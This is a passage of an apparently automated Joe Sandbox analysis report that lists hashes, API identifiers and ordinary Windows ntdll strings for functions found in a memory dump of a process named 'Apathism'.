                          • Instruction ID: 51101629204e62f43fd4bb3647f531d0949efef533be5824f408a0f1823467e2
                          • Opcode Fuzzy Hash: 51be870681c75acf77b807ac2563bf608967453751e1467bbb1bedab5e1db1d4
                          • Instruction Fuzzy Hash: 1811DC323257419FD75CCB24C480F6AB3E9EF4272AF1482A9E406EB256EB34DC80C795
                          Strings
                          • LdrpInitializationFailure, xrefs: 223B20FA
                          • Process initialization failed with status 0x%08lx, xrefs: 223B20F3
                          • minkernel\ntdll\ldrinit.c, xrefs: 223B2104
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-2986994758
                          • Opcode ID: bd16f529220f3540778c3c7684f12cd634067772f4d78bedc2983bddc8a9cbbb
                          • Instruction ID: 526d3b4b76332bcfb225c6457285a55e532712d10ec3d41dbd6fc151cad6487e
                          • Opcode Fuzzy Hash: bd16f529220f3540778c3c7684f12cd634067772f4d78bedc2983bddc8a9cbbb
                          • Instruction Fuzzy Hash: 25F02830640318ABE718DB48CD42F9937B8FF40B58F004524FA407B689D6F0A901CA90
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: #%u
                          • API String ID: 48624451-232158463
                          • Opcode ID: 89fb3e43dd90739a9de58173d8a0f60bb4f9323d3c146d33231344dc7685f597
                          • Instruction ID: 55f259d356e2953f04fd1195bf300448e52e13658f736c4983316793354953cb
                          • Opcode Fuzzy Hash: 89fb3e43dd90739a9de58173d8a0f60bb4f9323d3c146d33231344dc7685f597
                          • Instruction Fuzzy Hash: 38712971E002499FDB05CFA8D990BAEB7F8BF18704F144165E905AB251EA34EA41CB61
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: \B"
                          • API String ID: 0-1507244737
                          • Opcode ID: 4eac81beb1f78e4e8baae8f08165e3cf2c91b09a945517f73d44027155d7da9d
                          • Instruction ID: a55832242972bc07f5e7405488546d8831fbb1794ff834cf740da7df3dd3841a
                          • Opcode Fuzzy Hash: 4eac81beb1f78e4e8baae8f08165e3cf2c91b09a945517f73d44027155d7da9d
                          • Instruction Fuzzy Hash: AF41C0716043018FD725CF68C980E1BB7E9FF88318F01496AE99AC7616EF75E854CB51
                          Strings
                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 223B895E
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                          • API String ID: 0-702105204
                          • Opcode ID: f9d3d5573ce5de68d69f9de986cae5e133e668c2b5d572dec06f26c267265472
                          • Instruction ID: 1b19ff541eb72991bd3a6a29b8f68ef7688ddd352ab9acaff528dceca57ea8a1
                          • Opcode Fuzzy Hash: f9d3d5573ce5de68d69f9de986cae5e133e668c2b5d572dec06f26c267265472
                          • Instruction Fuzzy Hash: 13014E313007109FEB394F52CDC8FA67B75EF89794B400A18EA415AC55CF30AC41CEA2
                          Strings
                          • LdrResSearchResource Enter, xrefs: 2233AA13
                          • LdrResSearchResource Exit, xrefs: 2233AA25
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                          • API String ID: 0-4066393604
                          • Opcode ID: eb79c146274e8c30e9cd944c13d2f959589711b33c41408f07f387ab5349df81
                          • Instruction ID: 5636523bbf9c0ad114ad392af1a63e0d864fd6a077490ad1573d74c1bff5eb5f
                          • Opcode Fuzzy Hash: eb79c146274e8c30e9cd944c13d2f959589711b33c41408f07f387ab5349df81
                          • Instruction Fuzzy Hash: B5E16E72E04759AFEB12CF95CA80BDEB7B9FF05354F104126E902EB251D7789A41CB90
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: `$`
                          • API String ID: 0-197956300
                          • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                          • Instruction ID: c7ae6e51b26d00f0db90f65bf511be52a419a98000ce793cca8cd8cff21389ab
                          • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                          • Instruction Fuzzy Hash: A6C1DE312043429FDB24CF24D941B2BBBE5BF84358F144A2DFA99CA2A1D778D509CB92
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: Legacy$UEFI
                          • API String ID: 2994545307-634100481
                          • Opcode ID: c4422a4b4b5e833c06512ce39edee6b7693ed73cfc67ee31c2777aacaeffdc4e
                          • Instruction ID: ccbd20f44d10db16fc9ab4feea25dd350813ad5fe59cb84fb57c1023ceffa6bc
                          • Opcode Fuzzy Hash: c4422a4b4b5e833c06512ce39edee6b7693ed73cfc67ee31c2777aacaeffdc4e
                          • Instruction Fuzzy Hash: 82614C72E003189FDB24CFA8C9A0BAEBBF9FB44704F104179E699EB251D735A940CB50
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$MUI
                          • API String ID: 0-17815947
                          • Opcode ID: 5972ac7e7e4c3dbf740b7a21f2750b039839e077799a2c6c685bec6117fe973c
                          • Instruction ID: f338a2d83cca8e6559bd21e88a2c899f997d652da8310996f925849b7b750f51
                          • Opcode Fuzzy Hash: 5972ac7e7e4c3dbf740b7a21f2750b039839e077799a2c6c685bec6117fe973c
                          • Instruction Fuzzy Hash: F6513872E0031DAEDF11CFA5CD90AEEBBB9FB08754F10052AE611A7280D6749E45CBA0
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: Cleanup Group$Threadpool!
                          • API String ID: 2994545307-4008356553
                          • Opcode ID: 3a73061ef890fae3f535f50c94c0736c7f2a6ca01074b2764d61887e87e2c49d
                          • Instruction ID: 4c85e7e8ec106ce9bc2d314a6bbb3da5b2d72228cd614da50493df9b4ac4472d
                          • Opcode Fuzzy Hash: 3a73061ef890fae3f535f50c94c0736c7f2a6ca01074b2764d61887e87e2c49d
                          • Instruction Fuzzy Hash: A401A9B2650740AFE321CF24CD45B2677E8E744B19F018A3AEA58C7294E738D944CB5A
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: MUI
                          • API String ID: 0-1339004836
                          • Opcode ID: 66d85cd42b8a3fdffa46b7feb7577f938ed6a304f19bcf468225d58926b50016
                          • Instruction ID: 3c78f7c021760ad2137a907fddfe5ff2d0a5857798fc3d83ece6d95308859475
                          • Opcode Fuzzy Hash: 66d85cd42b8a3fdffa46b7feb7577f938ed6a304f19bcf468225d58926b50016
                          • Instruction Fuzzy Hash: 65827A75E003188FDB26CFA9C980BDDB7B5BF48754F10856AE919AB251DB309E81CB90
                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID:
                          • API String ID: 3446177414-0
                          • Opcode ID: 8ff293b31687b5867129f75664f818670bb6422e8367aa076e279afd770b16e1
                          • Instruction ID: 4ed922aedad427058f3461e5797e9bac5773d8d4314fa3085e0a3efd5dfd5cac
                          • Opcode Fuzzy Hash: 8ff293b31687b5867129f75664f818670bb6422e8367aa076e279afd770b16e1
                          • Instruction Fuzzy Hash: D522DD772047618BDB15CF29C390B72B7F1AF44348F14899AE9868F286E73DE552CB60
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a23f26889ce2fa7dc525c00748766daa322dc7e5c29a2fd4b599cf77d31dde10
                          • Instruction ID: 62ac851fe62d7e892e130443521665b60beec7f9f2ff4be296b82a4331d9de89
                          • Opcode Fuzzy Hash: a23f26889ce2fa7dc525c00748766daa322dc7e5c29a2fd4b599cf77d31dde10
                          • Instruction Fuzzy Hash: 01327A71A00305CFCB15CFA9C580B9AB7F5FF49304F10466AE996AB292DB34EA41CF94
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 38d68e6f4ec50c08049bb0c462c1801d9a03acda5fa962453e5780ae1ed442fc
                          • Instruction ID: 633a0085fce5ef5d6f9122f2ae1f9f0dc3ec3fec98dbd44c215c22512d83d56b
                          • Opcode Fuzzy Hash: 38d68e6f4ec50c08049bb0c462c1801d9a03acda5fa962453e5780ae1ed442fc
                          • Instruction Fuzzy Hash: 50E178716083418FC705CF28C590A5ABBF0FF89318F458A6DE9999B352DB31EA05CF96
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eb4afbfce5a534859c444e0a383c691380b5ea9ff722502e55fe5a4f7be8cd02
                          • Instruction ID: 5701f8e6d17005843eef2697c68e52c4947680c5bd7e63ab69d23e154034d0a6
                          • Opcode Fuzzy Hash: eb4afbfce5a534859c444e0a383c691380b5ea9ff722502e55fe5a4f7be8cd02
                          • Instruction Fuzzy Hash: A3A12431E00754AFDB21CF94C984F9E7BF8EF0A754F114261EA14AB292DB789D50CB91
                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID:
                          • API String ID: 3446177414-0
                          • Opcode ID: 381401ebb70911c39d4b310aa74f4ee013cb6ebd4952ee68c9b8a4a711bcbfda
                          • Instruction ID: b5ed0da1ef99d434c3ed957c887f2e265f1518eea14eb689b293aec6b3e23277
                          • Opcode Fuzzy Hash: 381401ebb70911c39d4b310aa74f4ee013cb6ebd4952ee68c9b8a4a711bcbfda
                          • Instruction Fuzzy Hash: 54418C71901B44CFC726DF69CA40B59B7B6FF54310F1086AAD4169B2A2EBB0AF41CF91
                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID:
                          • API String ID: 3446177414-0
                          • Opcode ID: 848f6af32bc133d970fba68601e2f3183d98bbfbd1c904f3f9ef3f19a691d6fa
                          • Instruction ID: 232b63db36de229cf0623506e70f9d6eb1ed971bf758f0963333ba76040420f1
                          • Opcode Fuzzy Hash: 848f6af32bc133d970fba68601e2f3183d98bbfbd1c904f3f9ef3f19a691d6fa
                          • Instruction Fuzzy Hash: DE418C729043049FD720CF65C840B9BBBE8FF88364F008A2EF998C7251DB749904CB92
                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID:
                          • API String ID: 3446177414-0
                          • Opcode ID: 9f5950c3fa173b40753293c942e5dc8d5973130b38b207b7e14a0ed0b246ae99
                          • Instruction ID: 7f6c0bd6cb687fd650b11581af0ef446ee4b5df3349ea45797fcc13e51f33649
                          • Opcode Fuzzy Hash: 9f5950c3fa173b40753293c942e5dc8d5973130b38b207b7e14a0ed0b246ae99
                          • Instruction Fuzzy Hash: 8241A0316043018FD726CF28D994B2ABBF9FF80764F10456DEA458B2A1DB74DA41CB91
                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID:
                          • API String ID: 3446177414-0
                          • Opcode ID: 8f268f230c54f2f49cfeb5f4ade35706693820428dc487ad882a7d294a6ccf2a
                          • Instruction ID: c9f2a8ca0324674802af1b70aef3628efead48ce404dc1639a005cc993a1bee4
                          • Opcode Fuzzy Hash: 8f268f230c54f2f49cfeb5f4ade35706693820428dc487ad882a7d294a6ccf2a
                          • Instruction Fuzzy Hash: EC3178B2505701CFC712DF1AC680A4ABFF1FF89618F448AEAF4889B251D7309E04CB92
                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID:
                          • API String ID: 3446177414-0
                          • Opcode ID: ec72afdf72119cce11353eb49d81b8c34c0b7a7826845a0cbabd672a4e93c0ae
                          • Instruction ID: a912a322932b7afe6dfaf38521cf9bca6343e2e4e567e22ebe38ba08d127150b
                          • Opcode Fuzzy Hash: ec72afdf72119cce11353eb49d81b8c34c0b7a7826845a0cbabd672a4e93c0ae
                          • Instruction Fuzzy Hash: 0E018936500619ABCF128F84C940EDA3B66FF4C754F068201FE1866620C63ADA70EB81
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID: 0-3916222277
                          • Opcode ID: 761ef8a8e43af3c81da7acae5aeb2e432458967d161ef44460e6f4c7f21dc0bd
                          • Instruction ID: c05cc522bea122032377ef3ec569704afb3e1cf35abb263d69d8aea5393084ef
                          • Opcode Fuzzy Hash: 761ef8a8e43af3c81da7acae5aeb2e432458967d161ef44460e6f4c7f21dc0bd
                          • Instruction Fuzzy Hash: E2915E72A41319ABDB21CFA5CD85FAE7BB8EF18B54F100065F604AB591D674AD10CFA0
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID: 0-3916222277
                          • Opcode ID: 8751ec751cb78c8d76ce35959dd5e2dc3192a52b48086c9a8c997fd8d5a5edd8
                          • Instruction ID: 042c4e6a290eb2fc251bbbb9a9bac77d779532b5367ceffb221931afab56dffd
                          • Opcode Fuzzy Hash: 8751ec751cb78c8d76ce35959dd5e2dc3192a52b48086c9a8c997fd8d5a5edd8
                          • Instruction Fuzzy Hash: DC919E33901748ABDB229BA4DD80FAFBFB9EF85754F100069F601A7251DB78D941CB91
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: GlobalTags
                          • API String ID: 0-1106856819
                          • Opcode ID: 521dca948ed2e6c36887611ed5c90d9e0a3a34b5e35e5b2a895ccc5e7c9ed69c
                          • Instruction ID: 997f19ad1d57e107689cac94762565c759ef3b002d95fac2f2d6c3a6cea69847
                          • Opcode Fuzzy Hash: 521dca948ed2e6c36887611ed5c90d9e0a3a34b5e35e5b2a895ccc5e7c9ed69c
                          • Instruction Fuzzy Hash: 0F714975E0031A8BDF18CF98D6A0A9DBBB5FF58704F10813AE906AB345EB359941CF50
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: .mui
                          • API String ID: 0-1199573805
                          • Opcode ID: 136991255fb034c942c5d45484042f6303f72045f89ba6bddf612a640beb9f2b
                          • Instruction ID: 2381a7c311b705211d1f99ed19e3e882c166b87c5db87522b442f1ff8006bc2b
                          • Opcode Fuzzy Hash: 136991255fb034c942c5d45484042f6303f72045f89ba6bddf612a640beb9f2b
                          • Instruction Fuzzy Hash: 9051A177D0132A9BCB18CF99C940AAEB7B8BF14B24F054169EA11BB214D7348D01CBA0
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: PhB"
                          • API String ID: 0-3147966021
                          • Opcode ID: 39536ab879a4fee2b5ce7a05ebf878932ba328c22d79a8bc82b02a55f2cc4ecd
                          • Instruction ID: 3a22332373d135110d1640c84bc9d2ecfddfb036656f40d5d120bcbd48a72189
                          • Opcode Fuzzy Hash: 39536ab879a4fee2b5ce7a05ebf878932ba328c22d79a8bc82b02a55f2cc4ecd
                          • Instruction Fuzzy Hash: CE4102707027009BC71DCB29EA90F6BF7DAEF90364FA08619E9198B391DB34DC01C691
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: EXT-
                          • API String ID: 0-1948896318
                          • Opcode ID: f6fe954260aa85a9dcbd6014639e1500aa2187b874a16a3189868caef4b5d5de
                          • Instruction ID: 8d5dbb6bf4d2742540e3188ea2070a30bf7d6d214e58ed9672e4afe2a7abd291
                          • Opcode Fuzzy Hash: f6fe954260aa85a9dcbd6014639e1500aa2187b874a16a3189868caef4b5d5de
                          • Instruction Fuzzy Hash: 1E4161729093519BD720DB75C980F5BBBE8AF88718F400EA9FA84D7140EB74DA04C796
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: pfB"
